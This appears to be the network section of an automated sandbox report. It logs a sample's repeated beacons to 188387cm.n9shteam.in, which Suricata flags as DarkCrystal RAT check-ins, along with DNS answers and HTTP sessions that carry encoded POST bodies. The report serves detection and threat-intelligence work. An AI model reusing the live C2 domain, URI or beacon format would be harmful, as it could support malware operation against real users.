                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-12-10T18:55:24.716612+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449741104.21.16.180TCP
                                                                                    2024-12-10T18:56:30.482340+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449762104.21.16.180TCP
                                                                                    2024-12-10T18:56:38.609309+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449763104.21.16.180TCP
                                                                                    2024-12-10T18:56:46.794894+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449764104.21.16.180TCP
                                                                                    2024-12-10T18:56:55.060545+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449765104.21.16.180TCP
                                                                                    2024-12-10T18:57:10.451235+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449766104.21.16.180TCP
                                                                                    2024-12-10T18:57:18.873049+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449768104.21.16.180TCP
                                                                                    2024-12-10T18:57:34.810568+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.449770104.21.16.180TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 10, 2024 18:55:23.361891031 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:23.500205040 CET8049741104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:55:23.500283003 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:23.500654936 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:23.635545969 CET8049741104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:55:23.877057076 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:24.020255089 CET8049741104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:55:24.604001045 CET8049741104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:55:24.716612101 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:24.871160030 CET8049741104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:55:24.919733047 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:55:25.347285986 CET4974180192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:29.194433928 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:29.313966990 CET8049762104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:29.314063072 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:29.314385891 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:29.433695078 CET8049762104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:29.670130014 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:29.791296959 CET8049762104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:30.400499105 CET8049762104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:30.482340097 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:30.662179947 CET8049762104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:30.675924063 CET4976280192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:37.237037897 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:37.357975006 CET8049763104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:37.358068943 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:37.358515024 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:37.477977991 CET8049763104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:37.716890097 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:37.841806889 CET8049763104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:38.461564064 CET8049763104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:38.609308958 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:38.697223902 CET8049763104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:38.706757069 CET4976380192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:45.472868919 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:45.592505932 CET8049764104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:45.592573881 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:45.593123913 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:45.717838049 CET8049764104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:45.951365948 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:46.076145887 CET8049764104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:46.684093952 CET8049764104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:46.794893980 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:46.939001083 CET8049764104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:46.945281982 CET4976480192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:53.676861048 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:53.803493023 CET8049765104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:53.803575039 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:53.803957939 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:53.923778057 CET8049765104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:54.154683113 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:54.274991989 CET8049765104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:54.903166056 CET8049765104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:55.060544968 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:56:55.156069994 CET8049765104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:56:55.165302992 CET4976580192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:09.196640015 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:09.316266060 CET8049766104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:09.316420078 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:09.316735029 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:09.436471939 CET8049766104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:09.670263052 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:09.793267012 CET8049766104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:10.401350021 CET8049766104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:10.451235056 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:10.680888891 CET8049766104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:10.688958883 CET4976680192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.343554020 CET4976780192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.462793112 CET8049767104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:17.462887049 CET4976780192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.463191032 CET4976780192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.582714081 CET8049767104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:17.582782984 CET8049767104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:17.610574961 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.730964899 CET8049768104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:17.731092930 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.731216908 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:17.852591038 CET8049768104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:18.076374054 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:18.195712090 CET8049768104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:18.817718029 CET8049768104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:18.873049021 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:19.095565081 CET8049768104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:19.099225998 CET4976880192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:25.480492115 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:25.600020885 CET8049769104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:25.600122929 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:25.600408077 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:25.719719887 CET8049769104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:25.951702118 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:26.074223042 CET8049769104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:26.713639975 CET8049769104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:26.763709068 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:26.975044966 CET8049769104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:26.986608982 CET4976980192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:33.549582005 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:33.678352118 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:33.678533077 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:33.679338932 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:33.810444117 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:34.029541016 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:34.158339024 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:34.764107943 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:34.810568094 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:35.016144991 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:35.060578108 CET4977080192.168.2.4104.21.16.1
                                                                                    Dec 10, 2024 18:57:35.207669973 CET8049770104.21.16.1192.168.2.4
                                                                                    Dec 10, 2024 18:57:35.215370893 CET4977080192.168.2.4104.21.16.1

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 10, 2024 18:55:22.854283094 CET5187253192.168.2.41.1.1.1
                                                                                    Dec 10, 2024 18:55:23.355797052 CET53518721.1.1.1192.168.2.4

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 10, 2024 18:55:22.854283094 CET192.168.2.41.1.1.10x7858Standard query (0)188387cm.n9shteam.inA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.16.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.48.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.112.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.64.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.96.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.80.1A (IP address)IN (0x0001)false
                                                                                    Dec 10, 2024 18:55:23.355797052 CET1.1.1.1192.168.2.40x7858No error (0)188387cm.n9shteam.in104.21.32.1A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • 188387cm.n9shteam.in

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449741104.21.16.1801432C:\Recovery\USZqVcJFLA.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:55:23.500654936 CET289OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:55:23.877057076 CET344OUTData Raw: 05 07 01 06 06 0f 01 03 05 06 02 01 02 02 01 0a 00 0a 05 0b 02 01 03 0d 01 56 0c 0c 07 02 01 53 0d 53 04 0c 02 03 04 01 0e 04 07 05 07 0a 06 01 03 0a 0b 09 0d 55 06 57 04 07 07 07 04 55 07 5b 01 53 0e 00 00 0f 06 05 0e 04 0f 03 0a 0d 0c 01 05 03
                                                                                    Data Ascii: VSSUWU[SS\L~sy]wLiv[^hBqLcot~pwZ{cJoYfkToQwI^N}u~V@zm\L~be
                                                                                    Dec 10, 2024 18:55:24.604001045 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:55:24.871160030 CET1026INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:55:24 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VCc4l8Mq4w8yasVGHIME8n3WQZ7Y%2BpBziQAakd4hvT8IZbrbE7zCVCgELsRBw3AAIL3xd3viH%2ByE0LTtPUaaz2ATjTKC5%2FGP4OWDbHdyNsBXkk3ojBR7vMEcb3yvNscdnbRSkMCajw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1b0dcd07c44f-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3191&min_rtt=1579&rtt_var=3817&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=633&delivery_rate=100821&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    1192.168.2.449762104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:56:29.314385891 CET354OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 332
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:29.670130014 CET332OUTData Raw: 05 00 04 06 03 0d 01 0b 05 06 02 01 02 05 01 03 00 04 05 08 02 06 03 0a 00 51 0f 02 03 0f 01 00 0d 53 07 08 03 0d 03 0a 0c 53 04 03 04 01 05 55 04 50 0e 09 0d 05 06 0b 07 03 06 04 07 01 00 0e 01 03 0f 5e 00 07 04 04 0c 0e 0e 01 0d 00 0f 06 05 50
                                                                                    Data Ascii: QSSUP^P^ZRUTQSR\L~|^i[vaj^aKUT||uMthLk`|JolUHzpWX|mp@cYQ^ie~V@x}~Oy\_
                                                                                    Dec 10, 2024 18:56:30.400499105 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:30.662179947 CET1028INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:30 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tUvEIZRzSEEz4FbcwiFrqgWL7YPd7YZKCaPku%2FJJJCnhIWRVvC88pkScHX0QqHcwZ2%2FNP5eKgf7O%2B00SuaOGM93bk7ZrnVGM017pY9335jBgUanXY6EGH2wY2mMU0BBAUWcExi9kuQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1ca90ab678d6-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3531&min_rtt=1806&rtt_var=4128&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=686&delivery_rate=93535&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    2192.168.2.449763104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:56:37.358515024 CET337OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:37.716890097 CET344OUTData Raw: 00 0b 01 00 06 0e 01 04 05 06 02 01 02 07 01 0a 00 05 05 08 02 05 03 0d 03 05 0f 00 07 0f 02 05 0c 06 06 01 02 50 04 05 0b 03 05 0a 04 07 02 04 03 0a 0f 0d 0c 04 07 0a 04 57 05 54 06 0b 07 0b 01 0b 0f 0d 05 0e 04 09 0c 0e 0c 02 0a 07 0e 03 05 07
                                                                                    Data Ascii: PWTQ\L~Nhcztrr\vK^@f_`Uw_|s`K{BpZl`iZkh@cww]ju~V@AzmnA}be
                                                                                    Dec 10, 2024 18:56:38.461564064 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:38.697223902 CET1035INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:38 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BDfsCJLI4TlbxCD4EPrlBkRXEANjCs7cA5SWCBCgTd%2F8SvhKrR4Cvs3X9HYFgPw8COGTjp0GfUQFYBLmnw7Ryha9AweJ1%2BJAjYrj9YvEk%2Bh56Mm8%2Fzyp22VADf6IXr8HVZPtmg5dQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1cdb6eaf42ef-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=15154&min_rtt=10362&rtt_var=13470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=29978&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    3192.168.2.449764104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:56:45.593123913 CET336OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:56:45.951365948 CET344OUTData Raw: 00 06 01 05 06 0f 01 05 05 06 02 01 02 0c 01 03 00 01 05 0b 02 00 03 0b 02 05 0a 04 07 07 01 55 0c 05 03 00 02 54 05 02 0c 01 04 01 05 56 02 01 03 0a 0b 0a 0c 0e 07 0a 07 00 04 50 07 06 06 0e 02 07 0e 59 07 03 07 06 0c 02 0b 01 0a 00 0f 08 04 00
                                                                                    Data Ascii: UTVPYVVVW\L}U|`a]`an\aftkUuw`h`kZx|`Yop~kSttgc^}O~V@x}~L~r}
                                                                                    Dec 10, 2024 18:56:46.684093952 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:56:46.939001083 CET1033INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:56:46 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XoriqbBOB%2BCnBJAgk1lEQ7zc2ueqGZthy0NIwZQh0Zv8mB0cHrZs%2FG7xwvZdK0CTWOsYpC%2B1WX%2FIOoNWFCDauGa4Om02vXkwCcpriwBN%2BPKJWeVHP2cfwKwBTBRkcXjuzOBECwh3zg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1d0ecd044356-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3115&min_rtt=1607&rtt_var=3620&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=680&delivery_rate=106740&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    4192.168.2.449765104.21.16.180
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Dec 10, 2024 18:56:53.803957939 CET337OUTPOST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
